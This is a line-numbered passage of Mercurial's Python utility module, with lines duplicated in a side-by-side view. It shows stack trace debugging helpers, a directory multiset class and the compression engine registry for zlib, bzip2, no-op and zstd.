3062 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3061 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3063 '''Yields lines for a nicely formatted stacktrace.
3062 '''Yields lines for a nicely formatted stacktrace.
3064 Skips the 'skip' last entries, then return the last 'depth' entries.
3063 Skips the 'skip' last entries, then return the last 'depth' entries.
3065 Each file+linenumber is formatted according to fileline.
3064 Each file+linenumber is formatted according to fileline.
3066 Each line is formatted according to line.
3065 Each line is formatted according to line.
3067 If line is None, it yields:
3066 If line is None, it yields:
3068 length of longest filepath+line number,
3067 length of longest filepath+line number,
3069 filepath+linenumber,
3068 filepath+linenumber,
3070 function
3069 function
3071
3070
3072 Not be used in production code but very convenient while developing.
3071 Not be used in production code but very convenient while developing.
3073 '''
3072 '''
3074 entries = [(fileline % (fn, ln), func)
3073 entries = [(fileline % (fn, ln), func)
3075 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3074 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3076 ][-depth:]
3075 ][-depth:]
3077 if entries:
3076 if entries:
3078 fnmax = max(len(entry[0]) for entry in entries)
3077 fnmax = max(len(entry[0]) for entry in entries)
3079 for fnln, func in entries:
3078 for fnln, func in entries:
3080 if line is None:
3079 if line is None:
3081 yield (fnmax, fnln, func)
3080 yield (fnmax, fnln, func)
3082 else:
3081 else:
3083 yield line % (fnmax, fnln, func)
3082 yield line % (fnmax, fnln, func)
3084
3083
3085 def debugstacktrace(msg='stacktrace', skip=0,
3084 def debugstacktrace(msg='stacktrace', skip=0,
3086 f=stderr, otherf=stdout, depth=0):
3085 f=stderr, otherf=stdout, depth=0):
3087 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3086 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3088 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3087 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3089 By default it will flush stdout first.
3088 By default it will flush stdout first.
3090 It can be used everywhere and intentionally does not require an ui object.
3089 It can be used everywhere and intentionally does not require an ui object.
3091 Not be used in production code but very convenient while developing.
3090 Not be used in production code but very convenient while developing.
3092 '''
3091 '''
3093 if otherf:
3092 if otherf:
3094 otherf.flush()
3093 otherf.flush()
3095 f.write('%s at:\n' % msg.rstrip())
3094 f.write('%s at:\n' % msg.rstrip())
3096 for line in getstackframes(skip + 1, depth=depth):
3095 for line in getstackframes(skip + 1, depth=depth):
3097 f.write(line)
3096 f.write(line)
3098 f.flush()
3097 f.flush()
3099
3098
3100 class dirs(object):
3099 class dirs(object):
3101 '''a multiset of directory names from a dirstate or manifest'''
3100 '''a multiset of directory names from a dirstate or manifest'''
3102
3101
3103 def __init__(self, map, skip=None):
3102 def __init__(self, map, skip=None):
3104 self._dirs = {}
3103 self._dirs = {}
3105 addpath = self.addpath
3104 addpath = self.addpath
3106 if safehasattr(map, 'iteritems') and skip is not None:
3105 if safehasattr(map, 'iteritems') and skip is not None:
3107 for f, s in map.iteritems():
3106 for f, s in map.iteritems():
3108 if s[0] != skip:
3107 if s[0] != skip:
3109 addpath(f)
3108 addpath(f)
3110 else:
3109 else:
3111 for f in map:
3110 for f in map:
3112 addpath(f)
3111 addpath(f)
3113
3112
3114 def addpath(self, path):
3113 def addpath(self, path):
3115 dirs = self._dirs
3114 dirs = self._dirs
3116 for base in finddirs(path):
3115 for base in finddirs(path):
3117 if base in dirs:
3116 if base in dirs:
3118 dirs[base] += 1
3117 dirs[base] += 1
3119 return
3118 return
3120 dirs[base] = 1
3119 dirs[base] = 1
3121
3120
3122 def delpath(self, path):
3121 def delpath(self, path):
3123 dirs = self._dirs
3122 dirs = self._dirs
3124 for base in finddirs(path):
3123 for base in finddirs(path):
3125 if dirs[base] > 1:
3124 if dirs[base] > 1:
3126 dirs[base] -= 1
3125 dirs[base] -= 1
3127 return
3126 return
3128 del dirs[base]
3127 del dirs[base]
3129
3128
3130 def __iter__(self):
3129 def __iter__(self):
3131 return iter(self._dirs)
3130 return iter(self._dirs)
3132
3131
3133 def __contains__(self, d):
3132 def __contains__(self, d):
3134 return d in self._dirs
3133 return d in self._dirs
3135
3134
3136 if safehasattr(parsers, 'dirs'):
3135 if safehasattr(parsers, 'dirs'):
3137 dirs = parsers.dirs
3136 dirs = parsers.dirs
3138
3137
3139 def finddirs(path):
3138 def finddirs(path):
3140 pos = path.rfind('/')
3139 pos = path.rfind('/')
3141 while pos != -1:
3140 while pos != -1:
3142 yield path[:pos]
3141 yield path[:pos]
3143 pos = path.rfind('/', 0, pos)
3142 pos = path.rfind('/', 0, pos)
3144
3143
3145 # compression code
3144 # compression code
3146
3145
3147 SERVERROLE = 'server'
3146 SERVERROLE = 'server'
3148 CLIENTROLE = 'client'
3147 CLIENTROLE = 'client'
3149
3148
3150 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3149 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3151 (u'name', u'serverpriority',
3150 (u'name', u'serverpriority',
3152 u'clientpriority'))
3151 u'clientpriority'))
3153
3152
3154 class compressormanager(object):
3153 class compressormanager(object):
3155 """Holds registrations of various compression engines.
3154 """Holds registrations of various compression engines.
3156
3155
3157 This class essentially abstracts the differences between compression
3156 This class essentially abstracts the differences between compression
3158 engines to allow new compression formats to be added easily, possibly from
3157 engines to allow new compression formats to be added easily, possibly from
3159 extensions.
3158 extensions.
3160
3159
3161 Compressors are registered against the global instance by calling its
3160 Compressors are registered against the global instance by calling its
3162 ``register()`` method.
3161 ``register()`` method.
3163 """
3162 """
3164 def __init__(self):
3163 def __init__(self):
3165 self._engines = {}
3164 self._engines = {}
3166 # Bundle spec human name to engine name.
3165 # Bundle spec human name to engine name.
3167 self._bundlenames = {}
3166 self._bundlenames = {}
3168 # Internal bundle identifier to engine name.
3167 # Internal bundle identifier to engine name.
3169 self._bundletypes = {}
3168 self._bundletypes = {}
3170 # Revlog header to engine name.
3169 # Revlog header to engine name.
3171 self._revlogheaders = {}
3170 self._revlogheaders = {}
3172 # Wire proto identifier to engine name.
3171 # Wire proto identifier to engine name.
3173 self._wiretypes = {}
3172 self._wiretypes = {}
3174
3173
3175 def __getitem__(self, key):
3174 def __getitem__(self, key):
3176 return self._engines[key]
3175 return self._engines[key]
3177
3176
3178 def __contains__(self, key):
3177 def __contains__(self, key):
3179 return key in self._engines
3178 return key in self._engines
3180
3179
3181 def __iter__(self):
3180 def __iter__(self):
3182 return iter(self._engines.keys())
3181 return iter(self._engines.keys())
3183
3182
3184 def register(self, engine):
3183 def register(self, engine):
3185 """Register a compression engine with the manager.
3184 """Register a compression engine with the manager.
3186
3185
3187 The argument must be a ``compressionengine`` instance.
3186 The argument must be a ``compressionengine`` instance.
3188 """
3187 """
3189 if not isinstance(engine, compressionengine):
3188 if not isinstance(engine, compressionengine):
3190 raise ValueError(_('argument must be a compressionengine'))
3189 raise ValueError(_('argument must be a compressionengine'))
3191
3190
3192 name = engine.name()
3191 name = engine.name()
3193
3192
3194 if name in self._engines:
3193 if name in self._engines:
3195 raise error.Abort(_('compression engine %s already registered') %
3194 raise error.Abort(_('compression engine %s already registered') %
3196 name)
3195 name)
3197
3196
3198 bundleinfo = engine.bundletype()
3197 bundleinfo = engine.bundletype()
3199 if bundleinfo:
3198 if bundleinfo:
3200 bundlename, bundletype = bundleinfo
3199 bundlename, bundletype = bundleinfo
3201
3200
3202 if bundlename in self._bundlenames:
3201 if bundlename in self._bundlenames:
3203 raise error.Abort(_('bundle name %s already registered') %
3202 raise error.Abort(_('bundle name %s already registered') %
3204 bundlename)
3203 bundlename)
3205 if bundletype in self._bundletypes:
3204 if bundletype in self._bundletypes:
3206 raise error.Abort(_('bundle type %s already registered by %s') %
3205 raise error.Abort(_('bundle type %s already registered by %s') %
3207 (bundletype, self._bundletypes[bundletype]))
3206 (bundletype, self._bundletypes[bundletype]))
3208
3207
3209 # No external facing name declared.
3208 # No external facing name declared.
3210 if bundlename:
3209 if bundlename:
3211 self._bundlenames[bundlename] = name
3210 self._bundlenames[bundlename] = name
3212
3211
3213 self._bundletypes[bundletype] = name
3212 self._bundletypes[bundletype] = name
3214
3213
3215 wiresupport = engine.wireprotosupport()
3214 wiresupport = engine.wireprotosupport()
3216 if wiresupport:
3215 if wiresupport:
3217 wiretype = wiresupport.name
3216 wiretype = wiresupport.name
3218 if wiretype in self._wiretypes:
3217 if wiretype in self._wiretypes:
3219 raise error.Abort(_('wire protocol compression %s already '
3218 raise error.Abort(_('wire protocol compression %s already '
3220 'registered by %s') %
3219 'registered by %s') %
3221 (wiretype, self._wiretypes[wiretype]))
3220 (wiretype, self._wiretypes[wiretype]))
3222
3221
3223 self._wiretypes[wiretype] = name
3222 self._wiretypes[wiretype] = name
3224
3223
3225 revlogheader = engine.revlogheader()
3224 revlogheader = engine.revlogheader()
3226 if revlogheader and revlogheader in self._revlogheaders:
3225 if revlogheader and revlogheader in self._revlogheaders:
3227 raise error.Abort(_('revlog header %s already registered by %s') %
3226 raise error.Abort(_('revlog header %s already registered by %s') %
3228 (revlogheader, self._revlogheaders[revlogheader]))
3227 (revlogheader, self._revlogheaders[revlogheader]))
3229
3228
3230 if revlogheader:
3229 if revlogheader:
3231 self._revlogheaders[revlogheader] = name
3230 self._revlogheaders[revlogheader] = name
3232
3231
3233 self._engines[name] = engine
3232 self._engines[name] = engine
3234
3233
3235 @property
3234 @property
3236 def supportedbundlenames(self):
3235 def supportedbundlenames(self):
3237 return set(self._bundlenames.keys())
3236 return set(self._bundlenames.keys())
3238
3237
3239 @property
3238 @property
3240 def supportedbundletypes(self):
3239 def supportedbundletypes(self):
3241 return set(self._bundletypes.keys())
3240 return set(self._bundletypes.keys())
3242
3241
3243 def forbundlename(self, bundlename):
3242 def forbundlename(self, bundlename):
3244 """Obtain a compression engine registered to a bundle name.
3243 """Obtain a compression engine registered to a bundle name.
3245
3244
3246 Will raise KeyError if the bundle type isn't registered.
3245 Will raise KeyError if the bundle type isn't registered.
3247
3246
3248 Will abort if the engine is known but not available.
3247 Will abort if the engine is known but not available.
3249 """
3248 """
3250 engine = self._engines[self._bundlenames[bundlename]]
3249 engine = self._engines[self._bundlenames[bundlename]]
3251 if not engine.available():
3250 if not engine.available():
3252 raise error.Abort(_('compression engine %s could not be loaded') %
3251 raise error.Abort(_('compression engine %s could not be loaded') %
3253 engine.name())
3252 engine.name())
3254 return engine
3253 return engine
3255
3254
3256 def forbundletype(self, bundletype):
3255 def forbundletype(self, bundletype):
3257 """Obtain a compression engine registered to a bundle type.
3256 """Obtain a compression engine registered to a bundle type.
3258
3257
3259 Will raise KeyError if the bundle type isn't registered.
3258 Will raise KeyError if the bundle type isn't registered.
3260
3259
3261 Will abort if the engine is known but not available.
3260 Will abort if the engine is known but not available.
3262 """
3261 """
3263 engine = self._engines[self._bundletypes[bundletype]]
3262 engine = self._engines[self._bundletypes[bundletype]]
3264 if not engine.available():
3263 if not engine.available():
3265 raise error.Abort(_('compression engine %s could not be loaded') %
3264 raise error.Abort(_('compression engine %s could not be loaded') %
3266 engine.name())
3265 engine.name())
3267 return engine
3266 return engine
3268
3267
3269 def supportedwireengines(self, role, onlyavailable=True):
3268 def supportedwireengines(self, role, onlyavailable=True):
3270 """Obtain compression engines that support the wire protocol.
3269 """Obtain compression engines that support the wire protocol.
3271
3270
3272 Returns a list of engines in prioritized order, most desired first.
3271 Returns a list of engines in prioritized order, most desired first.
3273
3272
3274 If ``onlyavailable`` is set, filter out engines that can't be
3273 If ``onlyavailable`` is set, filter out engines that can't be
3275 loaded.
3274 loaded.
3276 """
3275 """
3277 assert role in (SERVERROLE, CLIENTROLE)
3276 assert role in (SERVERROLE, CLIENTROLE)
3278
3277
3279 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3278 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3280
3279
3281 engines = [self._engines[e] for e in self._wiretypes.values()]
3280 engines = [self._engines[e] for e in self._wiretypes.values()]
3282 if onlyavailable:
3281 if onlyavailable:
3283 engines = [e for e in engines if e.available()]
3282 engines = [e for e in engines if e.available()]
3284
3283
3285 def getkey(e):
3284 def getkey(e):
3286 # Sort first by priority, highest first. In case of tie, sort
3285 # Sort first by priority, highest first. In case of tie, sort
3287 # alphabetically. This is arbitrary, but ensures output is
3286 # alphabetically. This is arbitrary, but ensures output is
3288 # stable.
3287 # stable.
3289 w = e.wireprotosupport()
3288 w = e.wireprotosupport()
3290 return -1 * getattr(w, attr), w.name
3289 return -1 * getattr(w, attr), w.name
3291
3290
3292 return list(sorted(engines, key=getkey))
3291 return list(sorted(engines, key=getkey))
3293
3292
3294 def forwiretype(self, wiretype):
3293 def forwiretype(self, wiretype):
3295 engine = self._engines[self._wiretypes[wiretype]]
3294 engine = self._engines[self._wiretypes[wiretype]]
3296 if not engine.available():
3295 if not engine.available():
3297 raise error.Abort(_('compression engine %s could not be loaded') %
3296 raise error.Abort(_('compression engine %s could not be loaded') %
3298 engine.name())
3297 engine.name())
3299 return engine
3298 return engine
3300
3299
3301 def forrevlogheader(self, header):
3300 def forrevlogheader(self, header):
3302 """Obtain a compression engine registered to a revlog header.
3301 """Obtain a compression engine registered to a revlog header.
3303
3302
3304 Will raise KeyError if the revlog header value isn't registered.
3303 Will raise KeyError if the revlog header value isn't registered.
3305 """
3304 """
3306 return self._engines[self._revlogheaders[header]]
3305 return self._engines[self._revlogheaders[header]]
3307
3306
3308 compengines = compressormanager()
3307 compengines = compressormanager()
3309
3308
3310 class compressionengine(object):
3309 class compressionengine(object):
3311 """Base class for compression engines.
3310 """Base class for compression engines.
3312
3311
3313 Compression engines must implement the interface defined by this class.
3312 Compression engines must implement the interface defined by this class.
3314 """
3313 """
3315 def name(self):
3314 def name(self):
3316 """Returns the name of the compression engine.
3315 """Returns the name of the compression engine.
3317
3316
3318 This is the key the engine is registered under.
3317 This is the key the engine is registered under.
3319
3318
3320 This method must be implemented.
3319 This method must be implemented.
3321 """
3320 """
3322 raise NotImplementedError()
3321 raise NotImplementedError()
3323
3322
3324 def available(self):
3323 def available(self):
3325 """Whether the compression engine is available.
3324 """Whether the compression engine is available.
3326
3325
3327 The intent of this method is to allow optional compression engines
3326 The intent of this method is to allow optional compression engines
3328 that may not be available in all installations (such as engines relying
3327 that may not be available in all installations (such as engines relying
3329 on C extensions that may not be present).
3328 on C extensions that may not be present).
3330 """
3329 """
3331 return True
3330 return True
3332
3331
3333 def bundletype(self):
3332 def bundletype(self):
3334 """Describes bundle identifiers for this engine.
3333 """Describes bundle identifiers for this engine.
3335
3334
3336 If this compression engine isn't supported for bundles, returns None.
3335 If this compression engine isn't supported for bundles, returns None.
3337
3336
3338 If this engine can be used for bundles, returns a 2-tuple of strings of
3337 If this engine can be used for bundles, returns a 2-tuple of strings of
3339 the user-facing "bundle spec" compression name and an internal
3338 the user-facing "bundle spec" compression name and an internal
3340 identifier used to denote the compression format within bundles. To
3339 identifier used to denote the compression format within bundles. To
3341 exclude the name from external usage, set the first element to ``None``.
3340 exclude the name from external usage, set the first element to ``None``.
3342
3341
3343 If bundle compression is supported, the class must also implement
3342 If bundle compression is supported, the class must also implement
3344 ``compressstream`` and `decompressorreader``.
3343 ``compressstream`` and `decompressorreader``.
3345
3344
3346 The docstring of this method is used in the help system to tell users
3345 The docstring of this method is used in the help system to tell users
3347 about this engine.
3346 about this engine.
3348 """
3347 """
3349 return None
3348 return None
3350
3349
3351 def wireprotosupport(self):
3350 def wireprotosupport(self):
3352 """Declare support for this compression format on the wire protocol.
3351 """Declare support for this compression format on the wire protocol.
3353
3352
3354 If this compression engine isn't supported for compressing wire
3353 If this compression engine isn't supported for compressing wire
3355 protocol payloads, returns None.
3354 protocol payloads, returns None.
3356
3355
3357 Otherwise, returns ``compenginewireprotosupport`` with the following
3356 Otherwise, returns ``compenginewireprotosupport`` with the following
3358 fields:
3357 fields:
3359
3358
3360 * String format identifier
3359 * String format identifier
3361 * Integer priority for the server
3360 * Integer priority for the server
3362 * Integer priority for the client
3361 * Integer priority for the client
3363
3362
3364 The integer priorities are used to order the advertisement of format
3363 The integer priorities are used to order the advertisement of format
3365 support by server and client. The highest integer is advertised
3364 support by server and client. The highest integer is advertised
3366 first. Integers with non-positive values aren't advertised.
3365 first. Integers with non-positive values aren't advertised.
3367
3366
3368 The priority values are somewhat arbitrary and only used for default
3367 The priority values are somewhat arbitrary and only used for default
3369 ordering. The relative order can be changed via config options.
3368 ordering. The relative order can be changed via config options.
3370
3369
3371 If wire protocol compression is supported, the class must also implement
3370 If wire protocol compression is supported, the class must also implement
3372 ``compressstream`` and ``decompressorreader``.
3371 ``compressstream`` and ``decompressorreader``.
3373 """
3372 """
3374 return None
3373 return None
3375
3374
3376 def revlogheader(self):
3375 def revlogheader(self):
3377 """Header added to revlog chunks that identifies this engine.
3376 """Header added to revlog chunks that identifies this engine.
3378
3377
3379 If this engine can be used to compress revlogs, this method should
3378 If this engine can be used to compress revlogs, this method should
3380 return the bytes used to identify chunks compressed with this engine.
3379 return the bytes used to identify chunks compressed with this engine.
3381 Else, the method should return ``None`` to indicate it does not
3380 Else, the method should return ``None`` to indicate it does not
3382 participate in revlog compression.
3381 participate in revlog compression.
3383 """
3382 """
3384 return None
3383 return None
3385
3384
3386 def compressstream(self, it, opts=None):
3385 def compressstream(self, it, opts=None):
3387 """Compress an iterator of chunks.
3386 """Compress an iterator of chunks.
3388
3387
3389 The method receives an iterator (ideally a generator) of chunks of
3388 The method receives an iterator (ideally a generator) of chunks of
3390 bytes to be compressed. It returns an iterator (ideally a generator)
3389 bytes to be compressed. It returns an iterator (ideally a generator)
3391 of bytes of chunks representing the compressed output.
3390 of bytes of chunks representing the compressed output.
3392
3391
3393 Optionally accepts an argument defining how to perform compression.
3392 Optionally accepts an argument defining how to perform compression.
3394 Each engine treats this argument differently.
3393 Each engine treats this argument differently.
3395 """
3394 """
3396 raise NotImplementedError()
3395 raise NotImplementedError()
3397
3396
3398 def decompressorreader(self, fh):
3397 def decompressorreader(self, fh):
3399 """Perform decompression on a file object.
3398 """Perform decompression on a file object.
3400
3399
3401 Argument is an object with a ``read(size)`` method that returns
3400 Argument is an object with a ``read(size)`` method that returns
3402 compressed data. Return value is an object with a ``read(size)`` that
3401 compressed data. Return value is an object with a ``read(size)`` that
3403 returns uncompressed data.
3402 returns uncompressed data.
3404 """
3403 """
3405 raise NotImplementedError()
3404 raise NotImplementedError()
3406
3405
3407 def revlogcompressor(self, opts=None):
3406 def revlogcompressor(self, opts=None):
3408 """Obtain an object that can be used to compress revlog entries.
3407 """Obtain an object that can be used to compress revlog entries.
3409
3408
3410 The object has a ``compress(data)`` method that compresses binary
3409 The object has a ``compress(data)`` method that compresses binary
3411 data. This method returns compressed binary data or ``None`` if
3410 data. This method returns compressed binary data or ``None`` if
3412 the data could not be compressed (too small, not compressible, etc).
3411 the data could not be compressed (too small, not compressible, etc).
3413 The returned data should have a header uniquely identifying this
3412 The returned data should have a header uniquely identifying this
3414 compression format so decompression can be routed to this engine.
3413 compression format so decompression can be routed to this engine.
3415 This header should be identified by the ``revlogheader()`` return
3414 This header should be identified by the ``revlogheader()`` return
3416 value.
3415 value.
3417
3416
3418 The object has a ``decompress(data)`` method that decompresses
3417 The object has a ``decompress(data)`` method that decompresses
3419 data. The method will only be called if ``data`` begins with
3418 data. The method will only be called if ``data`` begins with
3420 ``revlogheader()``. The method should return the raw, uncompressed
3419 ``revlogheader()``. The method should return the raw, uncompressed
3421 data or raise a ``RevlogError``.
3420 data or raise a ``RevlogError``.
3422
3421
3423 The object is reusable but is not thread safe.
3422 The object is reusable but is not thread safe.
3424 """
3423 """
3425 raise NotImplementedError()
3424 raise NotImplementedError()
3426
3425
3427 class _zlibengine(compressionengine):
3426 class _zlibengine(compressionengine):
3428 def name(self):
3427 def name(self):
3429 return 'zlib'
3428 return 'zlib'
3430
3429
3431 def bundletype(self):
3430 def bundletype(self):
3432 """zlib compression using the DEFLATE algorithm.
3431 """zlib compression using the DEFLATE algorithm.
3433
3432
3434 All Mercurial clients should support this format. The compression
3433 All Mercurial clients should support this format. The compression
3435 algorithm strikes a reasonable balance between compression ratio
3434 algorithm strikes a reasonable balance between compression ratio
3436 and size.
3435 and size.
3437 """
3436 """
3438 return 'gzip', 'GZ'
3437 return 'gzip', 'GZ'
3439
3438
3440 def wireprotosupport(self):
3439 def wireprotosupport(self):
3441 return compewireprotosupport('zlib', 20, 20)
3440 return compewireprotosupport('zlib', 20, 20)
3442
3441
3443 def revlogheader(self):
3442 def revlogheader(self):
3444 return 'x'
3443 return 'x'
3445
3444
3446 def compressstream(self, it, opts=None):
3445 def compressstream(self, it, opts=None):
3447 opts = opts or {}
3446 opts = opts or {}
3448
3447
3449 z = zlib.compressobj(opts.get('level', -1))
3448 z = zlib.compressobj(opts.get('level', -1))
3450 for chunk in it:
3449 for chunk in it:
3451 data = z.compress(chunk)
3450 data = z.compress(chunk)
3452 # Not all calls to compress emit data. It is cheaper to inspect
3451 # Not all calls to compress emit data. It is cheaper to inspect
3453 # here than to feed empty chunks through generator.
3452 # here than to feed empty chunks through generator.
3454 if data:
3453 if data:
3455 yield data
3454 yield data
3456
3455
3457 yield z.flush()
3456 yield z.flush()
3458
3457
3459 def decompressorreader(self, fh):
3458 def decompressorreader(self, fh):
3460 def gen():
3459 def gen():
3461 d = zlib.decompressobj()
3460 d = zlib.decompressobj()
3462 for chunk in filechunkiter(fh):
3461 for chunk in filechunkiter(fh):
3463 while chunk:
3462 while chunk:
3464 # Limit output size to limit memory.
3463 # Limit output size to limit memory.
3465 yield d.decompress(chunk, 2 ** 18)
3464 yield d.decompress(chunk, 2 ** 18)
3466 chunk = d.unconsumed_tail
3465 chunk = d.unconsumed_tail
3467
3466
3468 return chunkbuffer(gen())
3467 return chunkbuffer(gen())
3469
3468
3470 class zlibrevlogcompressor(object):
3469 class zlibrevlogcompressor(object):
3471 def compress(self, data):
3470 def compress(self, data):
3472 insize = len(data)
3471 insize = len(data)
3473 # Caller handles empty input case.
3472 # Caller handles empty input case.
3474 assert insize > 0
3473 assert insize > 0
3475
3474
3476 if insize < 44:
3475 if insize < 44:
3477 return None
3476 return None
3478
3477
3479 elif insize <= 1000000:
3478 elif insize <= 1000000:
3480 compressed = zlib.compress(data)
3479 compressed = zlib.compress(data)
3481 if len(compressed) < insize:
3480 if len(compressed) < insize:
3482 return compressed
3481 return compressed
3483 return None
3482 return None
3484
3483
3485 # zlib makes an internal copy of the input buffer, doubling
3484 # zlib makes an internal copy of the input buffer, doubling
3486 # memory usage for large inputs. So do streaming compression
3485 # memory usage for large inputs. So do streaming compression
3487 # on large inputs.
3486 # on large inputs.
3488 else:
3487 else:
3489 z = zlib.compressobj()
3488 z = zlib.compressobj()
3490 parts = []
3489 parts = []
3491 pos = 0
3490 pos = 0
3492 while pos < insize:
3491 while pos < insize:
3493 pos2 = pos + 2**20
3492 pos2 = pos + 2**20
3494 parts.append(z.compress(data[pos:pos2]))
3493 parts.append(z.compress(data[pos:pos2]))
3495 pos = pos2
3494 pos = pos2
3496 parts.append(z.flush())
3495 parts.append(z.flush())
3497
3496
3498 if sum(map(len, parts)) < insize:
3497 if sum(map(len, parts)) < insize:
3499 return ''.join(parts)
3498 return ''.join(parts)
3500 return None
3499 return None
3501
3500
3502 def decompress(self, data):
3501 def decompress(self, data):
3503 try:
3502 try:
3504 return zlib.decompress(data)
3503 return zlib.decompress(data)
3505 except zlib.error as e:
3504 except zlib.error as e:
3506 raise error.RevlogError(_('revlog decompress error: %s') %
3505 raise error.RevlogError(_('revlog decompress error: %s') %
3507 str(e))
3506 str(e))
3508
3507
3509 def revlogcompressor(self, opts=None):
3508 def revlogcompressor(self, opts=None):
3510 return self.zlibrevlogcompressor()
3509 return self.zlibrevlogcompressor()
3511
3510
3512 compengines.register(_zlibengine())
3511 compengines.register(_zlibengine())
3513
3512
3514 class _bz2engine(compressionengine):
3513 class _bz2engine(compressionengine):
3515 def name(self):
3514 def name(self):
3516 return 'bz2'
3515 return 'bz2'
3517
3516
3518 def bundletype(self):
3517 def bundletype(self):
3519 """An algorithm that produces smaller bundles than ``gzip``.
3518 """An algorithm that produces smaller bundles than ``gzip``.
3520
3519
3521 All Mercurial clients should support this format.
3520 All Mercurial clients should support this format.
3522
3521
3523 This engine will likely produce smaller bundles than ``gzip`` but
3522 This engine will likely produce smaller bundles than ``gzip`` but
3524 will be significantly slower, both during compression and
3523 will be significantly slower, both during compression and
3525 decompression.
3524 decompression.
3526
3525
3527 If available, the ``zstd`` engine can yield similar or better
3526 If available, the ``zstd`` engine can yield similar or better
3528 compression at much higher speeds.
3527 compression at much higher speeds.
3529 """
3528 """
3530 return 'bzip2', 'BZ'
3529 return 'bzip2', 'BZ'
3531
3530
3532 # We declare a protocol name but don't advertise by default because
3531 # We declare a protocol name but don't advertise by default because
3533 # it is slow.
3532 # it is slow.
3534 def wireprotosupport(self):
3533 def wireprotosupport(self):
3535 return compewireprotosupport('bzip2', 0, 0)
3534 return compewireprotosupport('bzip2', 0, 0)
3536
3535
3537 def compressstream(self, it, opts=None):
3536 def compressstream(self, it, opts=None):
3538 opts = opts or {}
3537 opts = opts or {}
3539 z = bz2.BZ2Compressor(opts.get('level', 9))
3538 z = bz2.BZ2Compressor(opts.get('level', 9))
3540 for chunk in it:
3539 for chunk in it:
3541 data = z.compress(chunk)
3540 data = z.compress(chunk)
3542 if data:
3541 if data:
3543 yield data
3542 yield data
3544
3543
3545 yield z.flush()
3544 yield z.flush()
3546
3545
3547 def decompressorreader(self, fh):
3546 def decompressorreader(self, fh):
3548 def gen():
3547 def gen():
3549 d = bz2.BZ2Decompressor()
3548 d = bz2.BZ2Decompressor()
3550 for chunk in filechunkiter(fh):
3549 for chunk in filechunkiter(fh):
3551 yield d.decompress(chunk)
3550 yield d.decompress(chunk)
3552
3551
3553 return chunkbuffer(gen())
3552 return chunkbuffer(gen())
3554
3553
3555 compengines.register(_bz2engine())
3554 compengines.register(_bz2engine())
3556
3555
3557 class _truncatedbz2engine(compressionengine):
3556 class _truncatedbz2engine(compressionengine):
3558 def name(self):
3557 def name(self):
3559 return 'bz2truncated'
3558 return 'bz2truncated'
3560
3559
3561 def bundletype(self):
3560 def bundletype(self):
3562 return None, '_truncatedBZ'
3561 return None, '_truncatedBZ'
3563
3562
3564 # We don't implement compressstream because it is hackily handled elsewhere.
3563 # We don't implement compressstream because it is hackily handled elsewhere.
3565
3564
3566 def decompressorreader(self, fh):
3565 def decompressorreader(self, fh):
3567 def gen():
3566 def gen():
3568 # The input stream doesn't have the 'BZ' header. So add it back.
3567 # The input stream doesn't have the 'BZ' header. So add it back.
3569 d = bz2.BZ2Decompressor()
3568 d = bz2.BZ2Decompressor()
3570 d.decompress('BZ')
3569 d.decompress('BZ')
3571 for chunk in filechunkiter(fh):
3570 for chunk in filechunkiter(fh):
3572 yield d.decompress(chunk)
3571 yield d.decompress(chunk)
3573
3572
3574 return chunkbuffer(gen())
3573 return chunkbuffer(gen())
3575
3574
3576 compengines.register(_truncatedbz2engine())
3575 compengines.register(_truncatedbz2engine())
3577
3576
3578 class _noopengine(compressionengine):
3577 class _noopengine(compressionengine):
3579 def name(self):
3578 def name(self):
3580 return 'none'
3579 return 'none'
3581
3580
3582 def bundletype(self):
3581 def bundletype(self):
3583 """No compression is performed.
3582 """No compression is performed.
3584
3583
3585 Use this compression engine to explicitly disable compression.
3584 Use this compression engine to explicitly disable compression.
3586 """
3585 """
3587 return 'none', 'UN'
3586 return 'none', 'UN'
3588
3587
3589 # Clients always support uncompressed payloads. Servers don't because
3588 # Clients always support uncompressed payloads. Servers don't because
3590 # unless you are on a fast network, uncompressed payloads can easily
3589 # unless you are on a fast network, uncompressed payloads can easily
3591 # saturate your network pipe.
3590 # saturate your network pipe.
3592 def wireprotosupport(self):
3591 def wireprotosupport(self):
3593 return compewireprotosupport('none', 0, 10)
3592 return compewireprotosupport('none', 0, 10)
3594
3593
3595 # We don't implement revlogheader because it is handled specially
3594 # We don't implement revlogheader because it is handled specially
3596 # in the revlog class.
3595 # in the revlog class.
3597
3596
3598 def compressstream(self, it, opts=None):
3597 def compressstream(self, it, opts=None):
3599 return it
3598 return it
3600
3599
3601 def decompressorreader(self, fh):
3600 def decompressorreader(self, fh):
3602 return fh
3601 return fh
3603
3602
3604 class nooprevlogcompressor(object):
3603 class nooprevlogcompressor(object):
3605 def compress(self, data):
3604 def compress(self, data):
3606 return None
3605 return None
3607
3606
3608 def revlogcompressor(self, opts=None):
3607 def revlogcompressor(self, opts=None):
3609 return self.nooprevlogcompressor()
3608 return self.nooprevlogcompressor()
3610
3609
3611 compengines.register(_noopengine())
3610 compengines.register(_noopengine())
3612
3611
3613 class _zstdengine(compressionengine):
3612 class _zstdengine(compressionengine):
3614 def name(self):
3613 def name(self):
3615 return 'zstd'
3614 return 'zstd'
3616
3615
3617 @propertycache
3616 @propertycache
3618 def _module(self):
3617 def _module(self):
3619 # Not all installs have the zstd module available. So defer importing
3618 # Not all installs have the zstd module available. So defer importing
3620 # until first access.
3619 # until first access.
3621 try:
3620 try:
3622 from . import zstd
3621 from . import zstd
3623 # Force delayed import.
3622 # Force delayed import.
3624 zstd.__version__
3623 zstd.__version__
3625 return zstd
3624 return zstd
3626 except ImportError:
3625 except ImportError:
3627 return None
3626 return None
3628
3627
3629 def available(self):
3628 def available(self):
3630 return bool(self._module)
3629 return bool(self._module)
3631
3630
3632 def bundletype(self):
3631 def bundletype(self):
3633 """A modern compression algorithm that is fast and highly flexible.
3632 """A modern compression algorithm that is fast and highly flexible.
3634
3633
3635 Only supported by Mercurial 4.1 and newer clients.
3634 Only supported by Mercurial 4.1 and newer clients.
